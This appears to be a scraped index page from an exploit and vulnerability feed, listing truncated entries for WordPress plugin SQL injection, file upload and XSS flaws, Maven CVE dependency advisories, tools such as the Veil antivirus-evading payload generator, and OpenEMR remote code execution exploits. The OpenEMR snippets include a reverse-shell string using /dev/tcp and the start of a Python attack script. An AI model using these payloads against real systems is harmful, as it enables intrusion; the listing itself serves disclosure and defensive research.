WordPress Adicon Server 1.2 Plugin - selectedPlace SQL Injection Vulnerability

Exploit for php platform in category web applications Exploit Title: WordPress Plugin Adicon Server 1.2 - 'selectedPlace' SQL Injection Software Link: https://wordpress.org/plugins/adicons/ Exploit Author: Kaimi Website: https://kaimi.io Version: 1.2 Category: webapps SQL Injection File:...

WordPress Audio Record 1.0 Plugin - Arbitrary File Upload Vulnerability

Exploit for php platform in category web applications Exploit Title: WordPress Plugin Audio Record 1.0 - Arbitrary File Upload Software Link: https://wordpress.org/plugins/audio-record/ Exploit Author: Kaimi Website: https://kaimi.io Version: 1.0 Category: webapps Unrestricted file upload in reco...

WordPress Cvp-Adegrontec 4.8.3 Shell Upload

Exploit Title : WordPress Cvp-Adegrontec Themes 4.8.3 Remote Shell Upload Vulnerability Author Discovered By : KingSkrupellos from Cyberizm Digital Security Army Date : 22/12/2018 Vendor Homepage : wordpress.org Software Download Link : N/A Tested On : Windows and Linux Category : WebApps Version...

ai.foremast.metrics:foremast-spring-boot-k8s-metrics-starter (>=0.1.2 <=0.1.6), cn.aghost:nacos-address (>=1.2.1.aghost-fix.20201109 <=1.2.1.aghost-fix.20210122) +408 more potentially affected by CVE-2018-15801 via org.springframework.security:spring-security-core (>=5.1.0.RELEASE <=5.1.1.RELEASE)

org.springframework.security:spring-security-core MAVEN version =5.1.0.RELEASE, =0.1.2, =1.2.1.aghost-fix.20201109, =1.2.1.aghost-fix.20201109, =1.2.1.aghost-fix.20201109, =1.2.1.aghost-fix.20201109, =1.2.1.aghost-fix.20201109, =1.2.1.aghost-fix.20201109, =1.2.1.aghost-fix.20201109,...

Yeswiki Cercopitheque - id SQL Injection Vulnerability

Exploit for php platform in category web applications Exploit Title: SQL Injection in Yeswiki Cercopitheque Exploit Author: Mickael BROUTY @ark1nar - FIDENS Vendor Homepage: https://yeswiki.net Software Link: https://repository.yeswiki.net/cercopitheque/yeswiki-cercopitheque-2018-12-07-1.zip...

WordPress newwpml 3.0 Database Disclosure

Exploit Title : WordPress newwpml Plugins 3.0 Database Backup Disclosure Author Discovered By : KingSkrupellos from Cyberizm Digital Security Army Date : 06/12/2018 Vendor Homepage : wordpress.org Software Download Link : N/A Tested On : Windows and Linux Category : WebApps Version Information :...

Veil - Tool To Generate Metasploit Payloads That Bypass Common Anti-virus Solutions

Veil is a tool designed to generate metasploit payloads that bypass common anti-virus solutions. Veil is current under support by @ChrisTruncer Software Requirements: The following OSs are officially supported: Debian 8+ Kali Linux Rolling 2018.1+ The following OSs are likely able to run Veil: Ar...

WordPress Jazzy Forms 1.1.1 Database Backup Disclosure

Exploit Title : WordPress jazzy-forms Plugins 1.1.1 Database Backup Information Disclosure Vulnerability Author Discovered By : KingSkrupellos from Cyberizm Digital Security Army Date : 30/11/2018 Vendor Homepage : wordpress.org/plugins/jazzy-forms/ Software Download Link :...

CloudBunny - A Tool To Capture The Real IP Of The Server That Uses A WAF As A Proxy Or Protection

CloudBunny is a tool to capture the real IP of the server that uses a WAF as a proxy or protection. How works In this tool we used three search engines to search domain information: Shodan, Censys and Zoomeye. To use the tools you need the API Keys, you can pick up the following links: Shodan -...

Shopify: Stored XSS on demo app link

Hi, I found stored XSS in apps.shopify.com in the DEMO URL of the apps you create. POC 1. go to your partner account and create a new app 2. go to DEMO link in https://apps.shopify.com/services/appsubmissions/edit of your app put the payload you see below: F374863 and when pressing on preview...

CVE-2018-19093

An issue has been found in libIEC61850 v1.3. It is a SEGV in ControlObjectClientsetCommandTerminationHandler in client/clientcontrol.c. NOTE: the software maintainer disputes this because it requires incorrect usage of the clientexamplecontrol program...

org.apache.camel:camel-atmosphere-websocket (=2.16.0), org.apache.camel:camel-example-cxf-tomcat (=2.16.0) +8 more potentially affected by CVE-2015-5348 via org.apache.camel:camel-servlet (=2.16.0)

org.apache.camel:camel-servlet MAVEN version =2.16.0 is affected by a known vulnerability. The following packages have a transitive dependency on org.apache.camel:camel-servlet and may be impacted: - org.apache.camel:camel-atmosphere-websocket =2.16.0 - org.apache.camel:camel-example-cxf-tomcat...

org.apache.camel:camel-example-cxf-proxy (=2.16.0), org.apache.camel:camel-sap-netweaver (=2.16.0) potentially affected by CVE-2015-5348 via org.apache.camel:camel-http (=2.16.0)

org.apache.camel:camel-http MAVEN version =2.16.0 is affected by a known vulnerability. The following packages have a transitive dependency on org.apache.camel:camel-http and may be impacted: - org.apache.camel:camel-example-cxf-proxy =2.16.0 - org.apache.camel:camel-sap-netweaver =2.16.0 Source...

org.apache.camel:camel-mail-starter (=2.22.0), org.nhind:direct-msg-monitor (>=6.0 <=8.1.0) +3 more potentially affected by CVE-2018-8041 via org.apache.camel:camel-mail (=2.22.0)

org.apache.camel:camel-mail MAVEN version =2.22.0 is affected by a known vulnerability. The following packages have a transitive dependency on org.apache.camel:camel-mail and may be impacted: - org.apache.camel:camel-mail-starter =2.22.0 - org.nhind:direct-msg-monitor =6.0, =6.0, =6.0, =8.1.0 -...

org.apache.camel:camel-mail-starter (>=2.21.0 <=2.21.1), org.wildfly.camel.example:example-camel-mail (=6.0.0) potentially affected by CVE-2018-8041 via org.apache.camel:camel-mail (>=2.21.0 <=2.21.1)

org.apache.camel:camel-mail MAVEN version =2.21.0, =2.21.0, =2.21.1 - org.wildfly.camel.example:example-camel-mail =6.0.0 Source cves: CVE-2018-8041 Source advisory: OSV:GHSA-JV74-F9PJ-XP3F...

File Manager < 3.0 - Authenticated Reflected Cross-Site Scripting (XSS)

Lack of sanitisation in the lang parameter in the admin dashboard could allow attacker to perform reflected XSS attacks against logged in administrators https://example.com/wp-admin/admin.php?page=wpfilemanager&lang=zhCNalertXSS...

WordPress Plugin Quizlord 2.0 - Cross-Site Scripting

WordPress Plugin Quizlord 2.0 - Cross-Site Scripting Exploit Title: WordPress Plugin Quizlord 2.0 - Cross-Site Scripting Date: 2018-08-29 Exploit Author: Renos Nikolaou Software Link: https://downloads.wordpress.org/plugin/quizlord.zip Version: 2.0 Tested on: Kali Linux CVE: N/A Description :...

OpenEMR < 5.0.1 - Remote Code Execution

Title: OpenEMR & /dev/tcp/127.0.0.1/1337 0&1' ''' !/usr/bin/env python import argparse import base64 import requests import sys ap = argparse.ArgumentParserdescription="OpenEMR RCE" ap.addargument"host", help="Path to OpenEMR Example: http://127.0.0.1/openemr." ap.addargument"-u", "--user",...

OpenEMR 5.0.1 - (Authenticated) Remote Code Execution

OpenEMR 5.0.1 - Authenticated Remote Code Execution Title: OpenEMR & /dev/tcp/127.0.0.1/1337 0&1' ''' !/usr/bin/env python import argparse import base64 import requests import sys ap = argparse.ArgumentParserdescription="OpenEMR RCE" ap.addargument"host", help="Path to OpenEMR Example:...

GHSA-72FG-JQHX-C68P Open Redirect in st

st is a module for serving static files. An attacker is able to craft a request that results in an HTTP 301 redirect to an entirely different domain. A request for: http://some.server.com//nodesecurity.org/%2e%2e would result in a 301 to //nodesecurity.org/%2e%2e which most browsers treat as a...